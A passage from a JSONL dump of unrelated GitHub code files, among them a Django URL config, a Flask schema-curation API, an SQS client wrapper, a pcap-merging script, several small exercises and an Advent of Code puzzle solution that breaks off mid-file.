URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom cmsapp.views import home,showdept,adddept,student,delete,addstudent,deleteStudent,search\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('',home,name=\"home\"),\n    path('showdept/',showdept,name=\"showdept\"),\n    path('adddept',adddept,name=\"adddept\"),\n    path('student',student,name=\"student\"),\n    path('delete/',delete,name='delete'),\n    path('addstudent',addstudent,name=\"addstudent\"),\n    path('deleteStudent/',deleteStudent,name='deleteStudent'),\n    path('search',search,name=\"search\")\n]\n","repo_name":"rahul-bhatia/Django-CollegeManagementSystem","sub_path":"collegeManagement/collegeManagement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74305939369","text":"from recombination import offspring\nimport random\n\n\ndef mutation(offspring,length,iterations,n_iteration):\n    Basemutationrate = 1\n    C = 1000\n    Newmutationrate = Basemutationrate /(1 + C*(iterations/n_iteration))\n    # random.randint needs two bounds, so use randrange(length) to pick a valid gene index\n    r1 = random.randrange(length)\n    # the random module has no normal(); gauss(0, 1) draws from a standard normal distribution\n    offspring.vector[r1] = offspring.vector[r1] + Newmutationrate*random.gauss(0, 1)\n    e = offspring\n\n    return e\n\n\n","repo_name":"melikaraad/Genetic_Algorithm","sub_path":"main_code/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11831374954","text":"\"\"\"Module for main Flask application.\"\"\"\n\nfrom http import HTTPStatus\nimport json\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Any, Tuple\nimport urllib\n\nfrom flask import Flask, abort, jsonify, request\nfrom flask_cors import CORS\nfrom pyinflect import getInflection\nimport requests\nfrom requests import RequestException\nfrom sdf.ontology import ontology\nimport spacy\nimport yaml\n\nfrom pycurator.common.config import settings\nfrom pycurator.common.logger import return_logger\nfrom pycurator.common.paths import (\n    EVENT_REC_DIR,\n    KGTK_EVENT_CACHE,\n    KGTK_REFVAR_CACHE,\n    LOG_DIR,\n    SCHEMA_DIR,\n)\nfrom 
pycurator.flask_backend import make_yaml\nfrom pycurator.flask_backend.event_prediction import init_embeddings, init_ss_model, request_top_n\nfrom pycurator.flask_backend.utils import consistent_refvars, contains_cycle, get_verb_lemma\nfrom pycurator.flask_backend.wikidata_linking import (\n filter_duplicate_candidates,\n get_request_kgtk,\n wikidata_topk,\n)\nfrom pycurator.gpt2_component.filter import DefaultCriteria\nfrom pycurator.gpt2_component.gpt2 import convert_sequence_to_text\n\nPARENT_DIR = Path(__file__).resolve().parent\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config[\"CORS_HEADERS\"] = \"Content-Type\"\n\nnlp = spacy.load(\"en_core_web_md\")\n\nlogger = return_logger(LOG_DIR / Path(\"app.log\"))\n\n# Resources initialization for sentence similarity model\nSS_MODEL = init_ss_model()\nDEFINITION_EMBEDDINGS, TEMPLATE_EMBEDDINGS = init_embeddings(SS_MODEL)\n\n\n@app.route(\"/\")\ndef index() -> str:\n \"\"\"Root page of Flask API.\n\n Returns:\n A test message.\n \"\"\"\n return \"What I think a REST API is supposed to be in flask (probably wrong)!\"\n\n\n@app.route(\"/api/get_slots\", methods=[\"GET\"])\ndef get_slots() -> Any:\n \"\"\"Gets slots and their type constraints, for a given primitive subtype.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n abort(HTTPStatus.BAD_REQUEST)\n event_primitive = request.args.get(\"event_primitive\")\n primitive = ontology.get_default_event(event_primitive)\n event_args = ontology.events[primitive].args\n slots = list(event_args)\n constraints = [sorted(arg.constraints) for arg in event_args.values()]\n return {\"slots\": slots, \"constraints\": constraints}\n\n\n@app.route(\"/api/get_all_primitives\", methods=[\"GET\"])\ndef get_all_primitives() -> Any:\n \"\"\"Gets all primitive subtypes, along with their subsubtypes and default description.\n\n Returns:\n A JSON response.\n \"\"\"\n primitives = []\n default_subtypes = sorted(set((e.type, e.subtype) for e in ontology.events.values()))\n for event_type, subtype in default_subtypes:\n type_subtype = f\"{event_type}.{subtype}\"\n primitives.append(\n {\n \"type\": type_subtype,\n \"subsubtypes\": ontology.get_event_subcats(event_type, subtype),\n \"description\": ontology.events[ontology.get_default_event(type_subtype)].definition,\n }\n )\n return {\"primitives\": primitives}\n\n\n@app.route(\"/api/get_top3\", methods=[\"GET\"])\ndef get_top3() -> Any:\n \"\"\"Gets top 3 primitive subtypes, given an English phrase.\n\n This currently relies on a sentence similarity model.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n abort(HTTPStatus.BAD_REQUEST)\n\n description: str = request.args.get(\"event_description\", default=\"\")\n if not description:\n abort(HTTPStatus.BAD_REQUEST)\n\n json_return = request_top_n(\n description,\n n=3,\n ss_model=SS_MODEL,\n definition_embeddings=DEFINITION_EMBEDDINGS,\n template_embeddings=TEMPLATE_EMBEDDINGS,\n )\n\n return jsonify(json_return)\n\n\n@app.route(\"/api/save_schema\", methods=[\"POST\"])\ndef save_schema() -> Tuple[Any, int]:\n \"\"\"Creates a schema from collected information.\n\n Returns:\n A JSON response of the schema filename and the schema itself. 
If the provided schema\n contains a cycle, an error message is returned instead.\n \"\"\"\n if not request.json:\n abort(HTTPStatus.BAD_REQUEST)\n schema_id = request.json[\"schema_id\"]\n schema_name = request.json[\"schema_name\"]\n schema_dscpt = request.json[\"schema_dscpt\"]\n events = request.json[\"events\"]\n for event in events:\n if \"args\" in event and event[\"args\"]:\n for arg in event[\"args\"]:\n if \"reference\" in arg and arg[\"reference\"] is None:\n del arg[\"reference\"]\n links = request.json[\"links\"]\n tracking = request.json[\"tracking\"]\n\n if contains_cycle(events, links):\n json_return = {\"fname\": \"err\", \"output\": \"cycle in graph\"}\n return json_return, HTTPStatus.BAD_REQUEST\n if not consistent_refvars(events):\n json_return = {\"fname\": \"err\", \"output\": \"refvar constraints not consistent\"}\n return json_return, HTTPStatus.BAD_REQUEST\n\n yaml_file = make_yaml.save_schema(\n make_yaml.create_schema(\n events=events,\n links=links,\n tracking=tracking,\n schema_id=schema_id,\n schema_name=schema_name,\n schema_dscpt=schema_dscpt,\n ),\n output_directory=SCHEMA_DIR,\n )\n\n yaml_output = yaml_file.read_text()\n json_return = {\"fname\": yaml_file.stem, \"output\": yaml_output}\n return json_return, HTTPStatus.CREATED\n\n\n@app.route(\"/api/get_saved_schemas\", methods=[\"GET\"])\ndef get_saved_schemas() -> Any:\n \"\"\"Lists file and display names of all saved schemas.\n\n File extensions are stripped, and the names are sorted.\n\n Returns:\n A JSON response.\n \"\"\"\n schema_paths = sorted(p for p in SCHEMA_DIR.glob(\"*.yaml\"))\n display_files = []\n for schema_path in schema_paths:\n with open(schema_path) as f:\n content = yaml.safe_load(f)[0]\n schema_id = content[\"schema_id\"]\n schema_name = content[\"schema_name\"]\n schema_dscpt = content[\"schema_dscpt\"]\n timestamp = content[\"schema_version\"].split(\"-\")\n time_stamp = \"-\".join(timestamp[:3]) + \", \" + \":\".join(timestamp[3:6])\n\n augmentation_flag = os.path.exists(EVENT_REC_DIR / f\"{schema_path.stem}.json\")\n display_files.append(\n {\n \"file\": schema_path.stem,\n \"schema_id\": schema_id,\n \"schema_name\": schema_name,\n \"schema_dscpt\": schema_dscpt,\n \"timestamp\": time_stamp,\n \"augmentation_flag\": augmentation_flag,\n }\n )\n return {\"schemaFiles\": display_files}\n\n\n@app.route(\"/api/get_schema\", methods=[\"GET\"])\ndef get_schema() -> Any:\n \"\"\"Loads a saved schema and event recommendations (if any) from two files.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n abort(HTTPStatus.BAD_REQUEST)\n requested_file = request.args.get(\"schemaFile\")\n with (SCHEMA_DIR / f\"{requested_file}.yaml\").open() as y_file:\n yaml_output = yaml.safe_load(y_file)[0]\n events = []\n for event_index, step in enumerate(yaml_output[\"steps\"], start=1):\n if \"required\" not in step:\n step[\"required\"] = True\n event = {\n \"event_primitive\": step[\"primitive\"],\n \"event_text\": step[\"id\"],\n \"id_num\": event_index,\n \"args\": step[\"slots\"],\n \"required\": step[\"required\"],\n \"comment\": step.get(\"comment\", None),\n \"reference\": step.get(\"reference\", None),\n }\n events.append(event)\n order = []\n for order_pair in yaml_output[\"order\"]:\n order.append([order_pair[\"before\"], order_pair[\"after\"]])\n\n rec_events = []\n try:\n with (EVENT_REC_DIR / f\"{requested_file}.json\").open() as rec_file:\n recommendations = json.load(rec_file)\n for key in recommendations[\"events\"].keys():\n rec_list = [key]\n 
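# each recommendation row has the form [event_key, rec_1, rec_2, ...]\n                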
rec_list.extend(recommendations[\"events\"][key])\n rec_events.append(rec_list)\n except IOError:\n print(f\"Recommendations not found for {requested_file}\")\n\n yaml_response = {\n \"schema_id\": yaml_output[\"schema_id\"],\n \"schema_name\": yaml_output[\"schema_name\"],\n \"schema_dscpt\": yaml_output[\"schema_dscpt\"],\n \"events\": events,\n \"order\": order,\n \"rec_events\": rec_events,\n }\n return yaml_response\n\n\n@app.route(\"/api/disambiguate_verb_kgtk\", methods=[\"POST\"])\ndef disambiguate_verb_kgtk() -> Any:\n \"\"\"Disambiguates verbs from event description and return candidate qnodes.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.json:\n abort(HTTPStatus.BAD_REQUEST)\n event_description = request.json[\"event_description\"]\n cleaned_description = event_description.replace(\"/\", \" \").replace(\"_\", \" \")\n event_verb = get_verb_lemma(nlp, cleaned_description)\n cached_file = KGTK_EVENT_CACHE / f\"{event_verb}.json\"\n if cached_file.is_file():\n with open(cached_file) as f:\n return json.load(f)\n kgtk_json = get_request_kgtk(event_verb)\n event_verb_participle = getInflection(event_verb, tag=\"VBG\")\n if event_verb_participle and event_verb_participle != event_verb:\n kgtk_json += get_request_kgtk(event_verb_participle[0])\n if not kgtk_json:\n return {\"event_verb\": kgtk_json, \"options\": []}\n unique_candidates = filter_duplicate_candidates(kgtk_json)\n options = []\n top3 = wikidata_topk(SS_MODEL, cleaned_description, unique_candidates, k=3)\n for candidate in top3:\n option = {\n \"qnode\": candidate[\"qnode\"],\n \"rawName\": candidate[\"label\"][0],\n \"definition\": candidate[\"description\"][0],\n }\n if option not in options:\n options.append(option)\n response = {\"event_verb\": event_verb, \"options\": options}\n with open(cached_file, \"w\") as f:\n json.dump(response, f)\n return response\n\n\n@app.route(\"/api/disambiguate_refvar_kgtk\", methods=[\"POST\"])\ndef disambiguate_refvar_kgtk() -> Any:\n \"\"\"Disambiguates refvar with KGTK webserver API.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.json:\n abort(HTTPStatus.BAD_REQUEST)\n refvar = request.json[\"refvar\"].lower()\n cleaned_refvar = refvar.replace(\"/\", \" \").replace(\"_\", \" \")\n cached_file = KGTK_REFVAR_CACHE / f\"{cleaned_refvar}.json\"\n if cached_file.is_file():\n with open(cached_file) as f:\n return json.load(f)\n kgtk_json = get_request_kgtk(cleaned_refvar)\n if not kgtk_json:\n return {\"event_verb\": kgtk_json, \"options\": []}\n if len(cleaned_refvar.split()) < 2:\n lemma_refvar = nlp(cleaned_refvar)[0].lemma_\n if lemma_refvar != cleaned_refvar:\n kgtk_json += get_request_kgtk(lemma_refvar)\n unique_candidates = filter_duplicate_candidates(kgtk_json)\n options = []\n top3 = wikidata_topk(SS_MODEL, refvar, unique_candidates, k=3)\n for candidate in top3:\n # description can be empty sometimes on less popular qnodes\n definition = \"\" if len(candidate[\"description\"]) < 1 else candidate[\"description\"][0]\n option = {\n \"qnode\": candidate[\"qnode\"],\n \"rawName\": candidate[\"label\"][0],\n \"definition\": definition,\n }\n if option not in options:\n options.append(option)\n response = {\"refvar\": refvar, \"options\": options}\n with open(cached_file, \"w\") as f:\n json.dump(response, f)\n return response\n\n\n@app.route(\"/api/get_gpt2_suggestions\", methods=[\"GET\"])\ndef get_gpt2_suggestions() -> Any:\n \"\"\"Gets suggestions from GPT-2 server.\n\n Returns:\n A JSON response.\n \"\"\"\n if not request.args:\n logging.error(\"Request 
missing URL parameters\")\n abort(HTTPStatus.BAD_REQUEST)\n schema_name = request.args.get(\"schema_name\")\n schema_dscpt = request.args.get(\"schema_dscpt\")\n events = request.args.getlist(\"events\")\n if not schema_name or not schema_dscpt:\n logging.error(\"Request missing name or description\")\n abort(HTTPStatus.BAD_REQUEST)\n\n text = convert_sequence_to_text(\n schema_name=schema_name,\n schema_desc=schema_dscpt,\n sequence=events,\n )\n text_formatted = urllib.parse.quote(text)\n\n request_url = (\n f\"http://{settings.gpt2_server}.example.org:5001/api/get_prediction?text={text_formatted}\"\n )\n try:\n request_response = requests.get(request_url, timeout=30)\n except RequestException as ex:\n logger.error(ex)\n abort(HTTPStatus.INTERNAL_SERVER_ERROR)\n if request_response.status_code != HTTPStatus.OK:\n logger.error(\"GPT-2 server returned status code %d\", request_response.status_code)\n abort(HTTPStatus.INTERNAL_SERVER_ERROR)\n predictions = request_response.json()[\"predictions\"]\n\n gpt2_filter = DefaultCriteria(existing_events=set(events), keep=5)\n suggestions = sorted(gpt2_filter.meet_criteria(predictions))\n\n response = {\"suggestions\": suggestions}\n return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, load_dotenv=False)\nelse:\n gunicorn_logger = logging.getLogger(\"gunicorn.error\")\n logger.level = gunicorn_logger.level\n","repo_name":"isi-vista/MASC","sub_path":"pycurator/flask_backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23975352981","text":"#importing bokeh and pandas\nfrom bokeh.plotting import figure, output_file, show\nimport pandas\n\n#prepare some data\n\ndf = pandas.read_excel(\"http://pythonhow.com/data/verlegenhuken.xlsx\", sheet_name=0)\npressures = df[\"Pressure\"]/10\ntemperatures = df[\"Temperature\"]/10\n\n#prepare the output file\noutput_file(\"Weather_data.html\")\n\n#create a figure object\np=figure(plot_width=800, plot_height=700, tools='pan')\n\np.title.text=\"Temperature and Air Pressure\"\np.title.text_color=\"Black\"\np.title.text_font=\"times\"\np.title.text_font_style=\"bold\"\np.xaxis.minor_tick_line_color=None\np.yaxis.minor_tick_line_color=None\np.xaxis.axis_label=\"Temperature (Celsius)\"\np.yaxis.axis_label=\"Pressure (hPa)\"\n\n#create line plot\np.triangle(temperatures, pressures)\n\n#write the plot in the figure object\nshow(p)","repo_name":"ahpehgit/python-scripts","sub_path":"jupyter/bokeh/script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13369853058","text":"import time\nimport functools\nimport os\nfrom scapy import *\n\n\ndef log_time(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n result = func(*args, **kwargs)\n end_time = time.time()\n print(\"Time: %f \" % (end_time - start_time))\n return result\n\n return wrapper\n\ndef merge():\n\n path = 'data/abnormal'\n filename = 'output/all.pcap'\n\n fs = os.listdir(path)\n fs = [os.path.join(path, f) for f in fs if f.find('pcap') != -1]\n writer = PcapWriter(filename)\n\n for f in fs:\n try:\n s = PcapReader(f)\n while True:\n try:\n p = s.read_packet()\n writer.write(p)\n except EOFError:\n break\n s.close()\n writer.flush()\n except Exception as e:\n print('Error', e)\n\n writer.flush()\n writer.close()\n\n\nif __name__ == 
\"__main__\":\n merge()\n","repo_name":"kangguangli/cryptography","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22916751828","text":"# -*- encoding: utf-8 -*-\n'''\n Settings used for parallel computing with the IPython cluster interface.\n'''\n\n__author__=\"Artur Glavic\"\n__credits__=[]\nfrom plot_script.plotpy_info import __copyright__, __license__, __version__, __maintainer__, __email__ #@UnusedImport\n__status__=\"Production\"\n\nimport os\n\n\n# keyword arguments of the Client function call\nCLIENT_KW=dict(\n ## ZMQ url of path to .json file\n #url_or_file=\"tcp://192.168.2.2:37377\", \n #exec_key=\"bc0a6222-f7d8-4b61-9a3a-4113cb02cd86\", \n ### ipython profile of the cluster controller\n #profile='netcluster', \n #profile_dir=None, \n #sshserver='glavic@192.168.2.2', \n timeout=5,\n ipython_dir=os.path.expanduser('~/.config/ipython'),\n #\n )\n\nCLUSTER_PLOTPY_DIR=os.path.abspath(os.path.split(os.path.split(__file__)[0])[0])#\"/home/glavic/plot-script\"#","repo_name":"aglavic/plotpy","sub_path":"plot_script/config/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74381120850","text":"# -*- coding: utf-8 -*-\n\nfrom five import grok\nfrom zope.component import queryMultiAdapter\nfrom zope.cachedescriptors.property import CachedProperty\nfrom sd.contents.interfaces import IStructuredDocument, IStructuredItem\nfrom sd.contents.interfaces import IDynamicStructuredItem\nfrom sd.rendering.interfaces import IStructuredView, IRendererResolver\nfrom sd.common.adapters.interfaces import IContentQueryHandler\n\ngrok.templatedir('templates')\n\n\nclass DocumentContentProvider(grok.View):\n \"\"\"Access to a document contents\n \"\"\"\n grok.require('zope2.View')\n grok.name('sd.document.onepage')\n grok.context(IStructuredDocument)\n grok.implements(IStructuredView)\n\n @CachedProperty\n def _contents(self):\n contentFilter = {\"object_provides\":\n 'sd.contents.interfaces.base.IStructuredItem'}\n handler = IContentQueryHandler(self.context)\n brains = handler and handler.query_contents(**contentFilter) or []\n return [brain.getObject() for brain in brains]\n\n def contents(self, *args, **kwargs):\n return self._contents\n\n\nclass GenericView(grok.View):\n \"\"\"The AT view of the SimpleParagraph\n \"\"\"\n grok.name('sd.generic_view')\n grok.context(IStructuredItem)\n grok.require('zope2.View')\n\n @CachedProperty\n def body(self):\n resolver = queryMultiAdapter((self.context, self.request),\n IRendererResolver)\n return resolver.renderer and resolver.renderer.render() or u\"\"\n","repo_name":"trollfot/sd.app","sub_path":"sd/app/contents/browser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70452281492","text":"import unittest\n\n# time = O(nlogn) | space = O(n) where n = len(arr)\n# solution: sort array.\nclass Solution:\n\n\tdef absolute_value_sort(self, arr):\n\t\t'''\n\t\tgiven an array of integers arr, write a function absSort(arr), that sorts the array according to the absolute values of the numbers in arr.\n\t\tIf two numbers have the same absolute value, sort them according to sign, where the negative numbers come before the positive 
numbers.\n\n\t\tparameters:\n\t\t\tarr: List[int]\n\t\treturn:\n\t\t\tresult: List[int]\n\t\t'''\n\t\treturn sorted(arr, key=lambda x: (abs(x), x))\n\n\nclass_obj = Solution()\n\n\nclass test(unittest.TestCase):\n\t\n\tdef test_1(self):\n\t\tself.assertEqual(class_obj.absolute_value_sort([2, -7, -2, -2, 0]), [0, -2, -2, 2, -7])\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"anthonynguyen2021/NonLeetCode","sub_path":"absolute_value_sort_Pramp/absolute_value_sort_slick.py","file_name":"absolute_value_sort_slick.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33647759082","text":"import pytest\nimport uuid\nimport random\nfrom time import sleep\n\nfrom core.decorator import timer\n\n\ndef delay_value(from_=45, to=55):\n return random.randrange(from_, to)\n\n\ndef test_timer():\n timer_label = uuid.uuid4()\n\n class TestClass:\n def __init__(self, delay):\n self.delay = delay\n\n @timer(label=timer_label)\n def do_nothing(self):\n sleep(self.delay/1000.0)\n\n delay = delay_value()\n tc = TestClass(delay)\n tc.do_nothing()\n\n delay2 = delay_value()\n tc2 = TestClass(delay2)\n tc2.do_nothing()\n\n assert tc.timer_measurements[timer_label] == pytest.approx(delay, rel=1e-2)\n assert tc2.timer_measurements[timer_label] == pytest.approx(delay2, rel=1e-2)\n\n\ndef test_timer_wo_label():\n delay = delay_value()\n\n class TestClass:\n @timer()\n def timer_use_function_name(self):\n sleep(delay/1000.0)\n\n tc = TestClass()\n tc.timer_use_function_name()\n\n assert tc.timer_measurements['timer_use_function_name'] == pytest.approx(delay, rel=1e-2)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/unit_tests/test_decorator.py","file_name":"test_decorator.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"709960004","text":"import atexit\nfrom datetime import date\nfrom flask import current_app\nimport logging\nimport os\nimport platform\nfrom pysqs_extended_client.SQSClientExtended import SQSClientExtended\nimport threading\nimport time\nfrom uuid import uuid4\n\nclass sqs_cl():\n\n n_resp_queue = 0\n\n def __init__(self):\n self.log(\"!!!!!!! 
create new sqs\")\n\n atexit.register(self.cleanup) # This works with real threading - but not with eventlet\n\n config = current_app.config\n\n self.sqs_client = SQSClientExtended(config['AWS_ACCESS_KEY'], config['AWS_SECRET_KEY'], config['AWS_REGION'], config['BUCKET_NAME'])\n self.sqs_client.set_always_through_s3(False)\n \n self.queue_rqs = {}\n for acnt in config['ACCOUNTS']:\n req_qname = (\n \"cyg\"\n + \"-\" + config['UNIDATA_SERVER_ID'].replace(\"-\",\"_\")\n + \"-rq\"\n + \"-\" + acnt\n )\n queue = self.sqs_client.sqs.get_queue_url(QueueName = req_qname)['QueueUrl']\n self.log(\"got existing queue \"+queue)\n self.queue_rqs[acnt] = queue\n\n self.create_resp_queue()\n self.server_name = platform.node()\n self.reqn = 0\n\n def __del__(self):\n self.cleanup()\n\n def get_queue_resp(self):\n idle_time = time.time() - self.last_qtime\n if idle_time >= 120:\n # Check that can read from queue - otherwise create a new one\n # Copes with queue being deleted by server tidy up process\n try:\n dummy = self.sqs_client.receive_message(self.queue_resp,1,0)\n except:\n self.create_resp_queue()\n self.last_qtime = time.time()\n return self.queue_resp\n\n def create_resp_queue(self):\n config = current_app.config\n self.n_resp_queue += 1\n resp_qname = (\n \"cyg\"\n + \"-\" + config['UNIDATA_SERVER_ID'].replace(\"-\",\"_\")\n + \"-resp\"\n + \"-\" + platform.node().replace(\"-\",\"_\")\n + \"-\" + date.today().strftime(\"%Y%m%d\")\n + \"-\" + str(os.getpid())\n # + \"-\" + str(threading.get_ident())\n + \"-\" + str(self.n_resp_queue)\n + \"-\" + str(uuid4())\n )[0:80]\n resp_qname = resp_qname.replace(\".\",\"_\")\n self.queue_resp_name = resp_qname\n self.queue_resp = self.__get_queue(resp_qname)\n self.last_qtime = time.time()\n\n def __get_queue(self, queue_name):\n try:\n queue = self.sqs_client.sqs.create_queue(\n QueueName = queue_name,\n Attributes = {\n 'MessageRetentionPeriod': '300',\n 'SqsManagedSseEnabled': 'true'\n }\n )\n self.log(\"created new queue \"+queue_name)\n except:\n queue = self.sqs_client.sqs.get_queue_url(QueueName = queue_name)\n self.log(\"got existing queue \"+queue_name)\n return queue['QueueUrl']\n\n def reset(self):\n # I hoped connection pool did this but no\n self.cleanup()\n\n def cleanup(self):\n self.log(\"cleanup\")\n if ('cyg-resp1' in self.queue_resp):\n return\n try:\n self.sqs_client.sqs.delete_queue(QueueUrl=self.queue_resp)\n self.log(\"deleted queue \"+self.queue_resp)\n except:\n self.log(\"failed to delete queue \"+self.queue_resp)\n pass\n\n def log(self, message):\n try:\n current_app.logger.info(message)\n except:\n pass\n","repo_name":"sl2000/cygnum-python-sqs-middleware","sub_path":"flaskr/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35009124973","text":"\"\"\"Submit config analysis jobs to NCG batch system.\"\"\"\n\nfrom __future__ import division, print_function\nimport os\nimport os.path\nimport optparse\nimport glob\n\nSOFTDIR = \"/lstore/cms/giles/LatticeQCD_IST2018/\"\n\n\ndef make_job_file(uid, input_file, output_dir):\n \"\"\"Build and submit analysis job.\"\"\"\n output_file = output_dir + str(uid) + '.csv'\n\n cmd = \"./bin/main.exe \"\n cmd += \"-i \" + input_file\n cmd += \" -o \" + output_file\n\n job_name = \"analysis_\" + str(uid) + \".job\"\n job_file = open(job_name, \"w\")\n job_file.write(\"echo Beginning\\ job\\n\")\n job_file.write(\"module load gcc-5.4\\n\")\n job_file.write(\"export 
PATH=/lstore/cms/giles/programs/bin:$PATH\\n\")\n job_file.write(\"export LD_LIBRARY_PATH=/lstore/cms/giles/programs/lib64\\n\")\n job_file.write(\"cd \" + SOFTDIR + \"\\n\")\n job_file.write(\"echo Paths\\ set\\n\")\n job_file.write(cmd + \"\\n\")\n job_file.close()\n\n sub = \"qsub \" + job_name\n print(\"Submitting: \" + sub)\n os.system(sub)\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser(usage=__doc__)\n parser.add_option(\"-i\", \"--input_dir\", dest=\"input_dir\",\n default=\"/lstore/cms/giles/configs/confs_b6.2_bin/\",\n action=\"store\", help=\"Directory of configs\")\n parser.add_option(\"-n\", \"--N\", dest=\"n\", action=\"store\", default=-1,\n help=\"Number of files to run\")\n parser.add_option(\"-o\", \"--output_dir\", dest=\"output_dir\", action=\"store\",\n default='Output/', help=\"Output directory\")\n opts, args = parser.parse_args()\n\n samples = glob.glob(opts.input_dir + '*.bin')\n print('Running over {} of {} samples found'.format(opts.n, len(samples)))\n if opts.n > 0:\n samples = samples[0:int(opts.n)]\n\n for i, sample in enumerate(samples):\n make_job_file(i, sample, opts.output_dir)\n # break\n","repo_name":"GilesStrong/LatticeQCD_IST2018","sub_path":"Batch/jobRunner_ncg.py","file_name":"jobRunner_ncg.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"24183728379","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# The function is expected to return an INTEGER.\r\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\r\n#\r\n\r\ndef diagonalDifference(arr):\r\n primal = list()\r\n second = list()\r\n sumpri = 0\r\n sumsec = 0\r\n\r\n for i in range(0, len(arr)):\r\n x = arr[i][i]\r\n primal.append(x)\r\n for i in range(0, len(arr)):\r\n y = arr[i][-(i + 1)]\r\n second.append(y)\r\n\r\n for i in primal:\r\n sumpri += i\r\n for i in second:\r\n sumsec += i\r\n\r\n absolute = abs(sumpri - (sumsec))\r\n\r\n return absolute\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input().strip())\r\n\r\n arr = []\r\n\r\n for _ in range(n):\r\n arr.append(list(map(int, input().rstrip().split())))\r\n\r\n result = diagonalDifference(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"halfcress/Hackkerrank_Problem_Solving_Algorithms","sub_path":"005_Diagonal_Difference.py","file_name":"005_Diagonal_Difference.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24716214020","text":"data = []\r\n\r\nwith open(\"C:\\\\Users\\\\matth\\\\Documents\\\\Documents\\\\Advent of Code\\\\input13.txt\", \"r\") as input:\r\n for line in input:\r\n data.append(line[:-1])\r\n\r\ngraph = []\r\nfor i in range(len(data)):\r\n graph.append([])\r\n for char in data[i]:\r\n graph[i].append(char)\r\n\r\n## NOTE: this assumes that the lower-right character of the graph is blank. 
This line\r\n## must be adjusted if the graph has a turn there.\r\ngraph[-1].append(\" \")\r\n\r\n# This array symbolizes an array of carts.\r\n# Each cart is represented by its current location, direction, and its next turn decision.\r\n# The last element is used in each tick, to make sure that the cart hasn't yet moved.\r\ncarts = []\r\nfor i in range(len(graph)):\r\n for j in range(len(graph[0])):\r\n if graph[i][j] == \">\":\r\n carts.append([[i, j], \"right\", \"left\"])\r\n elif graph[i][j] == \"<\":\r\n carts.append([[i, j], \"left\", \"left\"])\r\n elif graph[i][j] == \"v\":\r\n carts.append([[i, j], \"down\", \"left\"])\r\n elif graph[i][j] == \"^\":\r\n carts.append([[i, j], \"up\", \"left\"])\r\n\r\nfor i in range(len(graph)):\r\n for j in range(len(graph[0])):\r\n if graph[i][j] == \">\" or graph[i][j] == \"<\":\r\n graph[i][j] = \"-\"\r\n elif graph[i][j] == \"v\" or graph[i][j] == \"^\":\r\n graph[i][j] = \"|\"\r\n\r\n# define iterate on graph and carts\r\ndef iterate(graph, carts):\r\n\r\n # we want to first sort by x coordinate (cart[0][1]) then by y (cart[0][0])\r\n for i in range(len(carts)-1):\r\n cart = carts[i]\r\n nextCart = carts[i+1]\r\n if nextCart[0][1] < cart[0][1]:\r\n temp = cart\r\n carts[i] = nextCart\r\n carts[i+1] = temp\r\n elif nextCart[0][1] == cart[0][1] and nextCart[0][0] < cart[0][0]:\r\n temp = cart\r\n carts[i] = nextCart\r\n carts[i+1] = temp\r\n \r\n output = carts.copy()\r\n\r\n for c in carts:\r\n x = c[0][0]\r\n y = c[0][1]\r\n direction = c[1]\r\n tile = graph[x][y]\r\n if tile == \"|\":\r\n if direction == \"up\":\r\n c[0][0] -= 